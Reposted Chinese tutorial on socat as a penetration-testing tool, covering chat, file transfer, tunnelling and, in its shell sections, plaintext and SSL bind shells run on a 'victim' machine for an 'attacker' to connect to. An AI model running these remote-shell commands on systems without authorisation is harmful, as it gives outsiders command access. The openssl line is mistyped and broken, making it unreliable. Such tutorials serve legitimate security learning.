渗透测试中的哪些网络军刀

本文,为大家简单介绍我们常见的网络工具的一些使用方法。

快捷目录

Socat

Socat 是 Linux 下的一个多功能的网络工具。可以看做是 Netcat 的加强版。Socat 的主要特点就是在两个数据流之间建立通道,且支持众多协议和链接方式。如 IP、TCP、 UDP、IPv6、PIPE等。Nc可能是因为比较久没有维护,确实显得有些陈旧了。

😘安装

apt-get install socat

🤖监听 聊天工具

首先,我们在服务端开始监听。(谁做服务端,谁就要加stdout)

socat -dd tcp-listen:7777 stdout

渗透测试中的哪些网络军刀接下来,我们客户端连接。

socat - tcp4:192.168.50.77:7777
渗透测试中的哪些网络军刀

🐸正 反向弹shell

目标机(受害端)执行命令

socat tcp4-listen:8000 exec:/usr/bin/bash

攻击端执行命令

socat - tcp4:192.168.50.77:8000

效果如下:

渗透测试中的哪些网络军刀

😎文件传输

文件传输是最常用的,让我们一起看看如何实现。发送端执行命令

socat tcp4-listen:8000 file:kali.txt

接收端执行命令

socat tcp4:192.168.50.77:8000 file:kali.txt,creat
渗透测试中的哪些网络军刀

🐻‍❄️搭建异地组网

需要注意的是,服务端需为公网vps。

socat -d -d TCP-LISTEN:11443,reuseaddr TUN:192.168.255.1/24,up

客户端

socat TCP:xxx.xxx.xxx.xxx:11443 TUN:192.168.255.2/24,up #注意为公网IP和开启相关端口

📧SSL 连接

前面我们使用 socat 传 shell 的时候,其实交流的内容是明文传输的。为了让信息传输更加安全,我们借助 SSL 证书来完成这个操作。首先使用 openssl 这个软件,生成一个自签证书,为了让 socat 可以识别我们的证书和密钥,首先要把证书和密钥放进同一个文件中,并以.pem格式保存

openssl reg -newkey rsa:2048 -nodes -keyout bind_shell.key -x509 -days 36
2 -out bind shell.crt

接下来,服务端执行命令

socat OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=0,fork EXEC:/bin/bash

客户端执行命令

socat - OPENSSL:监听端的 IP:443,verify=0

当然,还有更多的玩法。大家可以参考命令帮助。

渗透测试中的哪些网络军刀

CryptCat

CryptCat具有双向加密功能。它可以跨网络连接读取和写入数据,使用 TCP 或 UDP协议。同时对通过网络传输的数据进行加密。详细教程请移步历史文章。

渗透测试中的哪些网络军刀
NC增强工具CryptCat

Netcat

之前也写过详细的使用文章,详细教程请移步历史文章。

渗透测试中的哪些网络军刀
Netcat(瑞士军刀)你想知道的都在这里

本内容观点仅代表发布作者本人观点立场,欣文网平台只做信息内容展示和存储。发布作者:全网转载,转转请注明出处:https://www.xinenw.com/34468.html

(0)
上一篇 2024年8月11日 19:31
下一篇 2024年8月11日 21:16

相关推荐

  • 130亿,游戏大哥要被卖了

    本文经授权转载自 投资界 (ID: pedaily2012) 作者:王露 曾经风靡全球的育碧被摆上货架—— 据彭博社报道,腾讯正在与育碧创始人Guillemot家族讨论联合收购育碧。消息传来,育碧股价一度大涨10%并停牌,最新市值17.1亿欧元(约为130亿人民币)。针对收购传闻,育碧也迅速作出回应:将在适当的时候向市场通报情况。 游戏玩家们对育碧一定不陌生…

    2024年10月25日
    500
  • 暴涨!国产手机这次的操作,真的看跪了

    第一季度已经过去半个月。 掐指一算,又是各家厂商斗数据的时候了。 近日市场调研机构 IDC 公布了 2024 年第一季度全球智能手机出货量报告。 其中显示,该季度全球一共出货了 2.894 亿台手机,同比增长 7.8%,大趋势还是挺乐观的。 但是展开看看,肯定是有人欢喜有人忧的啦。 关于三星和苹果的全球第一之争。 上一个季度苹果罕见地拿了个第一,结果现在又被…

    2024年5月5日
    3960
  • 我以为快手在海外被吊打,结果接近30%的巴西人成了老铁。

    都知道字节的 TikTok 在海外名声大噪,但哥几个又有谁知道,它的老对手快手,其实也出海了? 就前阵子,快手不也发财报了嘛,营收毛利都涨了,特别是经调整后的净利润,同比增长了 10347.6% 。。。这成绩,有种小数点按错了的狂野。 不少媒体,也都分析了他们家的电商业务是咋带飞的。但在财报里,差评君却发现了个大伙们可能一直忽略的东西,那就是快手的出海业务。…

    2024年6月2日
    2200
  • 两年后,这款“吸血鬼模拟器”来到了它的全面形态

    谈起吸血鬼,我总会想起很多经典的要素:不死之身与永恒诅咒的折磨,强大的力量与致命的弱点,神秘而优雅的外观下潜藏的原始兽性,这些独特的魅力,让吸血鬼成为了流行文化中的常客。 但当我披着斗篷,躲藏在小巷阴暗的角落,大气也不敢出,生怕被路过的卫兵发现的时候,我不禁有点纳闷:“我混得这么惨,算是哪门子吸血鬼?” 这要从《夜族崛起》刚刚发布的1.0正式版说起。 202…

    2024年5月12日
    2100
  • 把电脑变成积木?还是迷你主机厂商会玩

     一直关注迷你主机的差友们应该都知道,这个品类的终极目标之一,就是把一台电脑主机放进口袋里。 托尼最近就看到了一台把放进口袋这件事做得极其优雅的迷你主机—— Khadas Mind 。 你没有看错,视频里的这个哥们,不但把一台 13 代 i5 的迷你主机塞进了巴掌大的包里,而且整个动作行云流水,连个拔电源线的操作都没有。。。  如此优雅丝滑的一套小连招,直接…

    2024年8月19日
    1180

联系我们

400-800-8888

在线咨询: QQ交谈

邮件A:xinenw@qq.com

邮箱B:xinenw@163.com

工作时间:周一至周五,8:30-23:30;周六周日10:30-18:30;节假日休息

关注微信